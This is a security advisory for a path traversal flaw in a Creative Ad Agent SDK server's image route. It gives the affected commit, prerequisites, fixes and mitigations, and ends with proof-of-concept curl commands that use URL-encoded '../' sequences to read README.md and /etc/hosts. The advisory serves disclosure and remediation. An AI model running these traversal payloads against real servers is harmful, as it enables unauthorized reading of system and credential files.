# Vulnerability Summary: Creative Ad Agent SDK Server-Side Path Traversal Vulnerability ## Vulnerability Overview - **Vulnerability Type**: Path Traversal - **CVE ID**: CVE-2026-XXXX (pending assignment) - **CWE ID**: CWE-22 - **Affected Component**: `server/sdk-server.ts` - **Trigger Path**: `/images/:sessionId/:filename` - **Vulnerability Description**: The server does not perform path normalization and validation on user-controlled `sessionId` and `filename` parameters. An attacker can construct malicious paths containing `../` to read arbitrary files on the server (e.g., `/etc/hosts`, repository README, etc.). ## Impact Scope - **Affected Versions**: - Confirmed affected commit: `7516de156684dc55449db62acbaa021f8a3` (latest version) - All versions containing the same request-response flow logic may be affected - **Environment Requirements**: - Operating System: macOS (test environment) - Node.js Version: 22.17.0 - Deployment Method: Local execution - **Attack Prerequisites**: - Attacker must be able to send HTTP requests to the SDK server - Server exposes the `/images/:sessionId/:filename` route - Server process has file system read permissions - No reverse proxy or middleware filtering encoded traversal sequences (e.g., `%2e%2e`) ## Remediation Plan ### Recommended Fixes 1. **Path Normalization**: Before accessing a file, normalize the requested path and compare it with the base `generated-images` directory to ensure the final path remains within the allowed directory. 2. **Reject Absolute Paths and Traversal Sequences**: Strictly validate `sessionId` and `filename` parameters, rejecting requests containing `..` or absolute paths. 3. **Use Secure APIs**: Switch to `res.sendFile(filename, { root: imagesDir })` and enable strict filename validation. 4. **Add Regression Tests**: Write test cases for encoded traversal payloads (e.g., `%2e%2e`) to confirm inability to access files outside the `generated-images` directory. 5. **Issue Security Advisory**: Notify maintainers promptly after patch release. ### Temporary Mitigations - Do not expose the SDK server to untrusted networks. - At the reverse proxy layer, block encoded traversal sequences (e.g., `%2e%2e`, `%2f`, `%3a`). - Run the server under a low-privilege account or container to restrict access to directories outside `generated-images`. ## POC Code ```bash # 1. Start the affected server cd server npm install touch ../.env npm start # 2. Read files outside the intended generated-images directory curl -i --path-as-is 'http://127.0.0.1:3001/images/%2e%2e/README.md' # 3. Read host system files (e.g., /etc/hosts) curl -i --path-as-is 'http://127.0.0.1:3001/images/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/hosts' ``` > Note: In the above POC, `%2e%2e` is the URL-encoded form of `..`, used to bypass simple string filtering.